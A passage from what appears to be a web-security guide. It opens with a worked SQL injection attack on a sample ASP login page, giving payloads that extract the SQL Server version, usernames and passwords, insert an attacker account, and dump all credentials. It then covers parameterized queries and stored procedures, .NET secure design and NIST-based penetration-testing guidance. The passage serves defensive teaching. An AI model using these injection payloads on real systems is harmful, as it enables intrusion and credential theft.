Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/process_login.asp, line 35

We can use this technique to approximately determine the type of any column of any table in the database. This allows the attacker to create a well - formed 'insert' query, like this:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff )—

However, the potential of the technique doesn't stop there. The attacker can take advantage of any error message that reveals information about the environment, or the database. A list of the format strings for standard error messages can be obtained by running:

select * from master..sysmessages


Examining this list reveals some interesting messages. One especially useful message relates to type conversion. If you attempt to convert a string into an integer, the full contents of the string are returned in the error message. In our sample login page, for example, the following 'username' will return the specific version of SQL server, and the server operating system it is running on:

Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int.
/process_login.asp, line 35

This attempts to convert the built-in '@@version' constant into an integer because the first column in the 'users' table is an integer. This technique can be used to read any value in any table in the database. Since the attacker is interested in usernames and passwords, they are likely to read the usernames from the 'users' table, like this:

Username: ' union select min (username), 1, 1, 1 from users where username > 'a'—

This selects the minimum username that is greater than 'a', and attempts to convert it to an integer:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35

So the attacker now knows that the 'admin' account exists. He can now iterate through the rows in the table by substituting each new username he discovers into the 'where' clause:

Username: ' union select min(username),1,1,1 from users where username > 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35

Once the attacker has determined the usernames, he can start gathering passwords:

Username: ' union select password,1,1,1 from users where username = 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35


A more elegant technique is to concatenate all of the usernames and passwords into a single string, and then attempt to convert it to an integer. This illustrates another point; Transact-SQL statements can be string together on the same line without altering their meaning. The following script will concatenate the values:

begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo
end

The attacker 'logs in' with this 'username' (all on one line, obviously…)

Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end—

This creates a table 'foo', which contains the single column 'ret', and puts our string into it. Normally even a low-privileged user will be able to create a table in a sample database, or the temporary database.

The attacker then selects the string from the table, as before:

Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
/

SQL Injection Prevention - Using Store Procedure

One method of preventing SQL injection is to avoid the use of dynamically generated SQL in your code. By using parameterized queries and stored procedures, you then make it impossible for SQL injection to occur against your application. For example, the previous SQL query could have been done in the following way in order to avoid the attack demonstrated in the example:
Dim thisCommand As SQLCommand = New SQLCommand("SELECT Count(*) " & _ "FROM Users WHERE UserName = @username AND Password = @password", Connection)
thisCommand.Parameters.Add ("@username", SqlDbType.VarChar).Value = username
thisCommand.Parameters.Add ("@password", SqlDbType.VarChar).Value = password
Dim thisCount As Integer = thisCommand.ExecuteScalar()
By passing parameters you avoid many types of SQL injection attacks, and even better method of securing your database access is to use stored procedures. Stored procedures can secure your database by restricting objects within the database to specific accounts, and permitting the accounts to just execute stored procedures. Your code then does all database access using this one account that only has access to execute stored procedures. You do not provide this account any other permissions, such as write, which would allow an attacker to enter in SQL statement to executed against your database. Any interaction to your database would have to be done using a stored procedure which you wrote and is in the database itself, which is usually inaccessible to a perimeter network or DMZ.
So if you wanted to do the authentication via a stored procedure, it may look like the following:
Dim thisCommand As SQLCommand = New SqlCommand ("proc_CheckLogon", Connection)
thisCommand.CommandType = CommandType.StoredProcedure
thisCommand.Parameters.Add ("@username", SqlDbType.VarChar).Value = username
thisCommand.Parameters.Add ("@password", SqlDbType.VarChar).Value = password
thisCommand.Parameters.Add ("@return", SqlDbType.Int).Direction = ParameterDirection.ReturnValue
Dim thisCount As Integer = thisCommand.ExecuteScalar()
Finally, ensure you provide very little information to the user when an error does occur. If there is database access failure, make sure you don't dump out the entire error message. Always try to provide the least amount of information possible to the users. Besides, do you want them to start helping you to debug your code? If not, why provide them with debugging information? By following these tips for your database access you're on your way to preventing unwanted eyes from viewing your data
SQL Injection Prevention - Protect your SQL Syntax
To secure an application against SQL injection, developers must never allow client-supplied data to modify the syntax of SQL statements. In fact, the best protection is to isolate the web application from SQL altogether. All SQL statements required by the application should be in stored procedures and kept on the database server. The application should execute the stored procedures using a safe interface such as JDBC’s Callable Statement or ADO’s Command Object. If arbitrary statements must be used, use Prepared Statements. Both Prepared Statements and stored procedures compile the SQL statement before the user input is added, making it impossible for user input to modify the actual SQL statement.

The relevant code would look something like this:
String query = “SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = “+ request.getParameter(“pressReleaseID”); Statement stmt = dbConnection.createStatement(); ResultSet rs = stmt.executeQuery(query);
The first step toward securing this code is to take the SQL statement out of the web application and put it in a stored procedure on the database server.
CREATE PROCEDURE getPressRelease @pressReleaseID integer AS SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = @pressReleaseID
Now back to the application. Instead of string building a SQL statement to call the stored procedure, a CallableStatement is created to safely execute it.
CallableStatement cs = dbConnection.prepareCall(“{call getPressRelease(?)}”); cs.setInt(1, Integer.parseInt(request.getParameter(“pressReleaseID”))); ResultSet rs = cs.executeQuery();
In a .NET application, the change is similar. This ASP.NET code is vulnerable to SQL injection:
String query = "SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = " + Request["pressReleaseID"];
SqlCommand command = new SqlCommand(query,connection);
command.CommandType = CommandType.Text;
SqlDataReader dataReader = command.ExecuteReader();
As with JSP code, the SQL statement must be converted to a stored procedure, which can then be accessed safely by a stored procedure SqlCommand:
SqlCommand command = new SqlCommand("getPressRelease",connection);
command.CommandType = CommandType.StoredProcedure;
command.Parameters.Add("@PressReleaseID",SqlDbType.Int);
command.Parameters[0].Value = Convert.ToInt32(Request["pressReleaseID"]);
SqlDataReader dataReader = command.ExecuteReader();



SQL Injection Prevention - Protect from your Application Level
The other way to prevent from SQL Injection, You can protect it from the Application form by remove all character that could attempt any SQL injection. This is the Example of Remove SQL Character Function
Function RemoveCharacters()
dim frm,item
Set frm = Server.CreateObject(”Scripting.Dictionary”)
frm.CompareMode=1
For each Item in Request.Form
if trim(request.form(Item)) <> “” then
if request.form(Item) = “1″ or request.form(Item) = “0″ then
frm.Add CStr(Item), CBool(Replace(Request.Form(Item),”‘”,”‘’”))
else
frm.Add Cstr(Item), Replace(Request.Form(Item),”‘”,”‘’”)
end if
end if
Next
Set RemoveCharacters = frm
End Function
Your main function will call that remove function
dim myform
Set myform = RemoveCharacters()
From there, you just call your library element from the form library, for example: my form (”my variable”) and it’s delivered to the browser (or your application) cleansed and ready to use and you don’t have to declare any variables.
SQL Injection Prevention - Combination Approach
The best practice to design your database application is you need to prevent from any SQL injection attempts. So Firstly you need to make sure that your SQL Syntax is Secure Secondly, make sure that your application protect from any SQL characters attempts. And Finally, make use Store Procedure to update your database, and make sure that you define any restriction from your DBMS such as ORACLE and SQL Server.

Appendix 2 .NET Application

.NET programming is very popular nowadays because of the flexibility of .NET Framework. A lot of programmers develop software using .Net. Even though some say that .NET framework is a more secure platform it seems we must understand how to build secure application with .NET framework. The most popular .NET technology is WSE 2.0 Security. This technology is used to secure the .NET application through the Web to solve the lack security in XML technology that sends data between client and server.

Before we can secure our .NET Application that we build, we need to consider how to design a .NET Application first. Security is an important part of the design process and cannot be left until the implementation phase. A fully integrated security policy will provide the greatest protection against your application being subverted and simplify the process of integrating security functionality into your code. You cannot retrofit a comprehensive security model into a design.

The first step towards applying security to an application design is to identify the restricted resources and secrets, restricted resource is functionality to which you wish to control access to, and a secret is some piece of data that you wish to hide from third parties.

Creating the list of restricted resources associated with your application is the foundation for understanding the trust relationships that you need to define, which we discuss in the next section. Restricted resources tend to fall into three categories:
Functional resources - Functional resources are the features that your application provides, for example, the ability to approve a loan within a banking application. These resources are easy to identify and are defined with the functional specification for the application.
Subversion resource - Subversion resources do not appear to be significant at first glance but can be used in conjunction with a functional or external resource in order to subvert your application or the platform on which your application executed. For example, one resource is the ability to write data to a file that is used by the operating system to enforce security policy.
External resources - External resources are those that underpin your application—for example, a database. Access to these resources should be coordinated with access to your functional resources, so that, for example, users who are unable to approve loans through a functional resource are not able to edit the database directly to achieve the same effect.
Suggestions to help identify restricted resources:
Open your design to review. Do not work in isolation—ask for, and act on, the comments of your colleagues. Different people think in different ways, and we have found that reviewing application designs in groups is especially effective for identifying subversion resources
Apply common sense. Do not follow the business specification slavishly.
As an architect, you are responsible for designing an application that satisfies all of the business and technical objectives of the project, even those that are not stated explicitly. By applying some common sense, you can often identify resources that must be restricted in order to achieve the wider objectives of your organization.
Consider the way your application interacts with other systems.
Think carefully about the way in which your application depends on other services. Access to some resources may need to be restricted in order to protect other systems, even though they cannot be used to subvert your application.
Define and follow design standards. By applying a common design methodology to all of your projects, you can create patterns of functionality that are recognized easily as restricted resources.

Identifying Secrets
Identifying secrets is usually a simpler process than identifying restricted resources. You must examine each type of data that your application creates or processes, and decide if that data requires protection.
These are my suggestions that help you in identifying Secrets:
• Consider the effect of disclosure. Understand the impact of disclosing the data that your application works with, and use this information to assess what data should be a secret. Remember, sometimes data is protected for reasons of public image rather than practical considerations. For example, the damage to your company’s reputation exceeds the damage to a credit card holder if you expose his card number to the world. The credit card provider limits the cardholder’s liability, but there is no limit to the amount of damage bad publicity can do to your business.

• Consider who owns the data. If you process data that is created or supplied by another application, you should protect the data to at least the same level as that application does. Your application should not be an easy means of accessing data that is better protected elsewhere.

• Consider your legal obligations. You may have legal obligations to ensure that certain information remains private, especially the personal details of your customers. Seek legal advice to establish your responsibilities.


Developing a Secure .NET Application
The developer is often responsible for making implementation decisions, such as the strength of cryptography used to protect secrets or the way security roles are employed. There is often a temptation to adopt new and exciting technologies, which is a dangerous approach when applied to application security. Security is best established by using tried-and-tested techniques, and by using algorithms and implementations that have been subjected to extensive testing.
You should implement your security policy to simplify the configuration wherever possible, and to use default settings that offer a reasonable level of security without any configuration at all. You cannot expect a system administrator to have the in-depth knowledge required to develop the application or the time to invest in learning the intricacies of your application. Document the default settings you have used, and explain their significance.
This is some tips and tricks from me, you may follow these steps in while developing your .Net Application
• Take the time to understand the business. You will find it easier to understand the decisions made in the application design if you take the time to understand the business problem the application is intended to solve. Remember that the architect is the “bridge” between the business problem and the technical solution, and decisions that may appear to have no technical justification are often influenced by business factors.

• Do not rely on untested security libraries. Developers are usually responsible for selecting third-party tools and libraries for the application implementation. We recommend that you select security libraries from reputable companies and submit their products to your own security-testing procedure

• Ensure that someone knows when you make a change.
Implementing changes in isolation is likely to open security holes in your application. Components of a software system are often highly dependent on each other. Unless told of a change, other people working from the original design will assume that your components function as specified and will make implementation decisions for their own components based on those assumptions.

• Apply rigorous unit testing. You should test all of the classes that you develop as part of the application implementation. This testing should not only test the expected behavior, but also make sure that unexpected inputs or actions do not expose security weaknesses. In this regard, your unit testing is a simplified form of the security testing that we proscribe below.

• Remove any default accounts before deployment. It is usual to create default user accounts or trust levels that simplify unit testing; you must ensure that these are disabled or removed before the application is tested and deployed.
Security testing a .NET Application
Security testing is unlike ordinary application testing. The security tester looks for ways to subvert the security of an application prior to its deployment. Effective security testing can significantly reduce the number of security defects in an application and can highlight flaws in the application design. We
These are my suggestion to test your .NET Application:
• Play the part of the employee.
Do not limit your simulated attacks to those you expect a hacker to make. be sure to determine if it is possible for a disgruntled employee to subvert the application security. Employees are usually assigned more trust in an application security model, which can sometimes provide easier routes of attack.

• Test beyond the application itself.
Your testing should include attacks on the system on which the application depends, including database, directory, and email servers. In the case of .NET, you should also see if you can subvert your application via an attack on the runtime components. Poor configuration or a poor understanding of security functionality can often provide an avenue for an attack that can subvert the application indirectly.

• Test beyond the application design.
Do not fall into the trap of simply testing to ensure that the application design has been correctly implemented; this is functional testing, and it does not offer many insights into security failures. Monitor trends in general attack strategies. Expand your range of simulated attacks by monitoring the way real attacks are performed. Your customers may furnish you with descriptions of attacks they have seen, and you can learn from the way other applications and services are attacked.


Appendix 3 Testing Internet Connected Systems

(Appendix 3 guidelines taken from [NIST] National Institute of Standards and Technology http://csrc.nist.gov and http://csrc.nist.gov/publications/nistpubs)

Introduction

Technology and information system such as internet has brought many changes in the way organizations and individuals conduct business, and it would be difficult to operate effectively without the added efficiency and communications brought about by the internet. At the same time, the Internet has brought problems as the result of intruder attacks, both manual and automated, which can cost many organizations excessive amounts of money in damages and lost efficiency. Thus, organizations need to find methods for achieving their mission goals in using the information system and at the same time keeping their system secure from attack.

Security testing is perhaps the most conclusive determinant of whether a system is configured and continues to be configured to the correct security controls and policy. The types of testing described in this document are meant to assist network and system administrators and related security staff in keeping their systems operationally secure and resistant as much as possible to attack. These testing activities, if made part of standard system and network administration, can be highly cost-effective in preventing incidents and uncovering unknown vulnerabilities.

Security Testing and the System Development Life Cycle
Evaluation of system security can and should be conducted at different stages of system development. Security evaluation activities include, but are not limited to, risk assessment, certification and accreditation (C&A), system audits, and security testing at appropriate periods during a system’s life cycle. These activities are geared toward ensuring that the system is being developed and operated in accordance with an organization’s security policy. This section discusses how network security testing, as a security evaluation activity, fits into the system development life cycle.
• A typical systems lifecycle would include the following activities:
• Initiation – the system is described in terms of its purpose, mission, and configuration.
• Development and Acquisition – the system is possibly contracted and constructed according to documented procedures and requirements.
• Implementation and Installation – the system is installed and integrated with other applications, usually on a network.
• Operational and Maintenance – the system is operated and maintained according to its mission requirements.
• Disposal – the system’s lifecycle is complete and it is deactivated and removed from the network and active use.
Implementation Stage
During the Implementation Stage, Security Testing and Evaluation should be conducted on particular parts of the system and on the entire system as a whole. Security Test and Evaluation (ST&E) is an examination or analysis of the protective measures that are placed on an information system once it is fully integrated and operational.

The objectives of the ST&E are to:

• Uncover design, implementation and operational flaws that could allow the violation of security policy

• Determine the adequacy of security mechanisms, assurances and other properties to enforce the security policy

• Assess the degree of consistency between the system documentation and its implementation.


The scope of an ST&E plan typically addresses computer security, communications security, emanations security, physical security, personnel security, administrative security, and operations security.

Operational Stage

Once a system is operational, it is important to ascertain its operational status, that is, “…whether a system is operated according to its current security requirements. This includes both the actions of people who operate or use the system and the functioning of technical controls.”[nist2] The types of tests selected and the frequency in which they are conducted depend on the importance of the system and the resources available for testing. These tests, however, should be repeated periodically and whenever a major change is made to the system. For systems that are exposed to constant threat (e.g., web servers) or that protect critical information (e.g., firewalls), testing should be conducted more frequently.

During the Maintenance Stage, ST&E testing may need to be conducted just as it was during the Implementation Stage. This level of testing may also be required before the system can be returned to its operational state, depending upon the criticality of the system and its applications. For example, an important server or firewall may require full testing, whereas a desktop system may not.


Security Testing Techniques

There are several different types of security testing. The following section describes each testing technique, and provides additional information on the strengths and weakness of each. Some testing techniques are predominantly manual, requiring an individual to initiate and conduct the test. Other tests are highly automated and require less human involvement. Regardless of the type of testing, staff that setup and conduct security testing should have significant security and networking knowledge, including significant expertise in the following areas: network security, firewalls, intrusion detection systems, operating systems, programming and networking protocols.

Often, several of these testing techniques are used together to gain more comprehensive assessment of the overall network security posture. For example, penetration testing usually includes network scanning and vulnerability scanning to identify vulnerable hosts and services that may be targeted for later penetration. Some vulnerability scanners incorporate password cracking. None of these tests by themselves will provide a complete picture of the network or its security posture. After running any tests, certain procedures should be followed, including documenting the test results, informing system owners of the results, and ensuring that vulnerabilities are patched or mitigated.

Roles and Responsibilities for Testing
Only designated individuals, including network administrators or individuals contracted to perform the network scanning as part of a larger series of tests, should conduct the tests described in this section. The approval for the tests may need to come from as high as the CIO depending on the extent of the testing. It would be customary for the testing organization to alert other security officers, management, and users that network mapping is taking place. Since a number of these test mimic some of the signs of attack, the appropriate manages must be notified to avoid confusion and unnecessary expense. In some cases, it may be wise to alert local law enforcement officials if, for example, the security policy included notifying law enforcement.

Vulnerability Scanning
Vulnerability scanners take the concept of a port scanner to the next level. Like a port scanner, a vulnerability scanner identifies hosts and open ports, but it also provides information on the associated vulnerabilities (as opposed to relying on human interpretation of the results). Most vulnerability scanners also attempt to provide information on mitigating discovered vulnerabilities. Vulnerability scanners provide system and network administrators with proactive tools that can be used to identify vulnerabilities before an adversary can find them. A vulnerability scanner is a relatively fast and easy way to quantify an organization's exposure to surface vulnerabilities. A surface vulnerability is a weakness, as it exists in isolation, independent from other vulnerabilities. The difficultly in identifying the risk level of vulnerabilities is that they rarely exist in isolation. For example there could be several “low risk” vulnerabilities that exist on a particular network that, when combined, present a high risk. A vulnerability scanner would generally not recognize the danger of the combined vulnerabilities and thus would assign a low risk to them leaving the network administrator with a false sense of confidence in his or her security measures. The reliable way to identify the risk of vulnerabilities in aggregate is through penetration testing.

Vulnerability scanners attempt to identify vulnerabilities in the hosts scanned. Vulnerability scanners can also help identify out-of-date software versions, applicable patches or system upgrades, and validate compliance with, or deviations from, the organization's security policy. To accomplish this, vulnerability scanners identify operating systems and major software applications running on hosts and match them with known exposures. Scanners employ large databases of vulnerabilities to identify flaws associated with commonly used operating systems and applications. The scanner will often provide significant information and guidance on mitigating discovered vulnerabilities. In addition vulnerability scanners can automatically make corrections and fix certain discovered vulnerabilities. This assumes that the operator of the vulnerability scanners has “root” or administrator access to the vulnerable host. However, vulnerability scanners have some significant weaknesses. Generally, they only identify surface vulnerabilities and are unable to address the overall risk level of a scanned network. Although the scan process itself is highly automated, vulnerability scanners can have a high false positive error rate (reporting vulnerabilities when none exist). This means an individual with expertise in networking and operating system security and in administration must interpret the results.

Since vulnerability scanners require more information than port scanners to reliably identify the vulnerabilities on a host, vulnerability scanners tend to generate significantly more network traffic than port scanners. This may have a negative impact on the hosts or network being scanned or network segments through which scanning traffic is traversing. Many vulnerability scanners also include tests for denial of service (DoS) attacks that, in the hands of an inexperienced tester, can have a considerable negative impact on scanned hosts.

Another significant limitation of vulnerability scanners is that they rely on constant updating of the vulnerability database in order to recognize the latest vulnerabilities. Before running any scanner, organizations should install the latest updates to its vulnerability database. Some vulnerability scanner databases are updated more regularly than others. The frequency of updates should be a major consideration when choosing a vulnerability scanner.

Vulnerability scanners are better at detecting well-known vulnerabilities than the more esoteric ones, primarily because it is difficult to incorporate all known vulnerabilities in a timely manner. Also, manufacturers of these products keep the speed of their scanners high (more vulnerabilities detected requires more tests which slows the overall scanning process).

Vulnerability scanners can be of two types: network-based scanners and host-based scanners. Network-based scanners are used primarily for mapping an organization's network and identifying open ports and related vulnerabilities. In most cases, these scanners are not limited by the operating system of targeted systems. The scanners can be installed on a single system on the network and can quickly locate and test numerous hosts. Host-based scanners have to be installed on each host to be tested and are used primarily to identify specific host operating system and application misconfigurations and vulnerabilities. Because host-based scanners are able to detect vulnerabilities at a higher degree of detail than network-based scanners, they usually require not only host (local) access but also a “root” or administrative account. Some host-based scanners offer the capability of repairing misconfigurations.

Organizations should conduct vulnerability scanning to validate that operating systems and major applications are up to date on security patches and software version. Vulnerability scanning is a somewhat labor-intensive activity that requires a high degree of human involvement in interpreting the results. It may also disrupt network operations by taking up bandwidth and slowing response times. However, vulnerability scanning is extremely important for ensuring that vulnerabilities are mitigated before they are discovered and exploited by adversaries. Vulnerability scanning should be conducted at least quarterly to semi-annually. Highly critical systems such as firewalls, public web servers, and other perimeter points of entry should be scanned nearly continuously. It is also recommended that since no vulnerability scanner can detect all vulnerabilities, more than one should be used. A common practice is to use a commercially available scanner and a freeware scanner. Vulnerability scanning results should be documented and discovered deficiencies corrected.

Penetration Testing

Penetration testing is security testing in which evaluators attempt to circumvent the security features of a system based on their understanding of the system design and implementation. The purpose of penetration testing is to identify methods of gaining access to a system by using common tools and techniques used by attackers. Penetration testing should be performed after careful consideration, notification, and planning.

Penetration testing can be an invaluable technique to any organization's information security program. However, it is a very labor-intensive activity and requires great expertise to minimize the risk to targeted systems. At a minimum, it may slow the organization's networks response time due to network scanning and vulnerability scanning. Furthermore, the possibility exists that systems may be damaged in the course of penetration testing and may be rendered inoperable, even though the organization benefits in knowing that the system could have been rendered inoperable by an intruder. Although this risk is mitigated by the use of experienced penetration testers, it can never be fully eliminated.

Penetration testing can be overt or covert. These two types of penetration testing are commonly referred to as Blue Teaming and Red Teaming. Blue Teaming involves performing a penetration test with the knowledge and consent of the organization's IT staff. Red Teaming involves performing a penetration test without the knowledge of the organization's IT staff but with full knowledge and permission of the upper management. Some organizations designate a trusted third party for the Red Teaming exercises to ensure that an organization does not take measures associated with the real attack without verifying that an attack is indeed under way (i.e., the activity they are seeing does not originate from an exercise). The trusted third party provides an agent for the testers, the management, and the IT and security staff that mediates the activities and facilitates communications. This type of test is useful for testing not only network security, but also the IT staff's response to perceived security incidents and their knowledge and implementation of the organization's security policy. The Red Teaming may be conducted with or without warning.

Of the two types of penetration tests, Blue Teaming is the least expensive and most frequently used. Red Teaming, because of the stealth requirements, requires more time and expense. To operate in a stealth environment, a Red Team will have to slow its scans and other actions to move below the ability of the target organization’s Intrusion Detection System) and firewall to detect their actions. However, Red Teaming provides a better indication of everyday security of the target organization since system administrators will not be on heightened awareness.

A penetration test can be designed to simulate an inside and/or an outside attack. If both internal and external testing are to be performed, the external testing usually occurs first. With external penetration testing, firewalls usually limit the amount and types of traffic that are allowed into the internal network from external sources. Depending on what protocols are allowed through, initial attacks are generally focused on commonly used and allowed application protocols such as FTP, HTTP, or SMTP and POP.

To simulate an actual external attack, the testers are not provided with any real information about the target environment other than targeted IP address/ranges and they must covertly collect information before the attack. They collect information on the target from public web pages, newsgroups and similar sites. They then use port scanners and vulnerability scanners to identify target hosts. Since they are, most likely, going through a firewall, the amount of information is far less than they would get if operating internally. After identifying hosts on the network that can be reached from the outside, they attempt to compromise one of the hosts. If successful, they then leverage this access to compromise others hosts not generally accessible from outside. This is why penetration testing is an iterative process that leverages minimal access to gain greater access.

An internal penetration test is similar to an external except that the testers are now on the internal network (i.e., behind the firewall) and are granted some level of access to the network (generally as a user but sometimes at a higher level). The penetration testers will then try to gain a greater level of access to the network through privilege escalation. The testers are provided with the information about a network that somebody with their provided privileges would normally have. This is generally as a standard employee although it can also be anything up to and including a system or network administrator depending on the goals of the test.

While vulnerability scanners only check that a vulnerability may exist, the attack phase of a penetration test exploits the vulnerability, confirming its existence. Most vulnerabilities exploited by penetration testing and malicious attackers fall into the following categories:

• Kernel Flaws—Kernel code is the core of an operating system. The kernel code enforces the overall security model for the system. Any security flaw that occurs in the kernel puts the entire system in danger.
• Buffer Overflows—A buffer overflow occurs when programs do not adequately check input for appropriate length, which is usually a result of poor programming practice. When this occurs, arbitrary code can be introduced into the system and executed with the privileges of the running program. This code often can be run as root on Unix systems and SYSTEM (administrator equivalent) on Windows systems.
• Symbolic Links—A symbolic link or symlink is a file that points to another file. Often there are programs that will change the permissions granted to a file. If these programs run with privileged permissions, a user could strategically create symlinks to trick these programs into modifying or listing critical system files.
• File Descriptor Attacks—File descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames. Certain file descriptors have implied uses. When a privileged program assigns an inappropriate file descriptor, it exposes that file to compromise.
• Race Conditions—Race conditions can occur when a program or process has entered into a privileged mode but before the program or process has given up its privileged mode. A user can time an attack to take advantage of this program or process while it is still in the privileged mode. If an attacker successfully manages to compromise the program or process during its privileged state, then the attacker has won the “race.” Common race conditions include signal handling and core-file manipulation.
• File and Directory Permissions—File and directory permissions control the access users and processes have to files and directories. Appropriate permissions are critical to the security of any system. Poor permissions could allow any number of attacks, including the reading or writing of password files or the addition of hosts to the list of trusted remote hosts
• Trojans—Trojan programs can be custom built or could include programs such as BackOrifice, NetBus, and SubSeven. Kernel root kits could also be employed once access is obtained to allow a backdoor into the system at anytime.
• Social Engineering—Social engineering is the technique of using persuasion and/or deception to gain access to, or information about, information systems. It is typically implemented through human conversation or other interaction. The usual medium of choice is telephone but can also be e-mail or even face-to-face interaction. Social engineering generally follows two standard approaches. In the first approach the penetration tester poses as a user experiencing difficultly and calls the organization’s help desk in order to gain information on the target network or host, obtain a login ID and credentials, or get a password reset. The second approach is to pose as the help desk and call a user in order to get the user to provide his/her user id(s) and password(s). This technique can be extremely effective.
• In the planning phase, rules of engagement, test plans and written permission are developed. In the discovery and attack phase, written logs are usually kept and periodic reports are made to system administrators and/or management, as appropriate. Generally, at the end of the test an overall testing report is developed to describe the identified vulnerabilities, provide a risk rating, and to give guidance on the mitigation of the discovered weaknesses.
Penetration testing is important for determining how vulnerable an organization's network is and the level of damage that can occur if the network is compromised. Because of the high cost and potential impact, annual penetration testing may be sufficient. The results of penetration testing should be taken very seriously and discovered vulnerabilities should be mitigated. As soon as they are available, the results should be presented to the organization’s managers.

Corrective measures can include closing discovered and exploited vulnerabilities, modifying an organization's security policies, creating procedures to improve security practices, and conducting security awareness training for personnel to ensure that they understand the implications of poor system configurations and poor security practices. Organizations should consider conducting less labor-intensive testing activities on a regular basis to ensure that they are in compliance with their security policies and are maintaining the required security posture. If an organization performs other tests (e.g., network scanning and vulnerability scanning) regularly between the penetration testing exercises and corrects discovered deficiencies, it will be well prepared for the next penetration testing exercise and for a real attack.

Post-Testing Actions
For most organizations, testing likely will reveal issues that need to be addressed quickly. How these issues are addressed and mitigated is the most important step in the testing process. The most common root cause is lack of (or poorly enforced) organizational Security Policy. Perhaps the single largest contributor to poorly secured systems is the lack of an organizational security policy. A security policy is important as it ensures consistency. Consistency is a critical component of a successful security posture because it leads to predictable behavior. This will make it easier for an organization to maintain secure configurations and will assist in identifying security problems (which often manifest themselves as deviations from predictable, expected behavior). Each organization needs to have a security policy and to communicate that policy to users and administrators.

Software (Un)Reliability

Many successful attacks exploit errors (“bugs”) in the software code used on computers and networks. Organizations can minimize the problems caused by software errors in several ways. For code developed in-house, the proper procedures for code development and testing should implemented to ensure the appropriate level of quality control. The organization will have less control over the quality of the code that is purchased from outside vendors. To mitigate this risk, organizations should regularly check for updates and patches from vendors and apply them in a timely manner. When organizations are considering the purchase of commercially produced software, they should check vulnerability databases (e.g., http://icat.nist.gov) and examine the past performance of the vendor’s software (however, past performance may not always be an accurate indicator of future performance).

General Information Security Principles

When addressing security issues, some general information security principles should be kept in mind [Curtin 01], as follows:

• Simplicity—Security mechanisms (and information systems in general) should be as simple as possible. Complexity is at the root of many security issues.

• Fail-Safe—If a failure occurs, the system should fail in a secure manner. That is, if a failure occurs, security should still be enforced. It is better to lose functionality than lose security.

• Complete Mediation—Rather than providing direct access to information, mediators that enforce access policy should be employed. Common examples include files system permissions, web proxies and mail gateways.

• Open Design—System security should not depend on the secrecy of the implementation or it components. “Security through obscurity” does not work.

• Separation of Privilege—Functions, to the degree possible, should be separate and provide as much granularity as possible. The concept can apply to both systems and operators/users. In the case of system operators and users, roles should be as separate as possible. For example if resources allow, the role of system administrator should be separate from that of the security administrator.

• Psychological Acceptability—Users should understand the necessity of security. This can be provided through training and education. In addition, the security mechanisms in place should present users with sensible options that will give them the usability they require on a daily basis. If users find the security mechanisms too cumbersome, they find ways to work around or compromise them. An example of this is using random passwords that are very strong but difficult to remember; users may write them down or looks for methods to circumvent the policy.

• Layered Defense—Organizations should understand that any single security mechanism is generally insufficient. Security mechanisms (defenses) need to be layered so that compromise of a single security mechanism is insufficient to compromise a host or network. There is no “magic bullet” for information system security.

• Compromise Recording—When systems and networks are compromised, records or logs of that compromise should be created. This information can assist in securing the network and host after the compromise and assist in identifying the methods and exploits used by the attacker. This information can be used to better secure the host or network in the future. In addition, this can assist organizations in identifying and prosecuting attackers.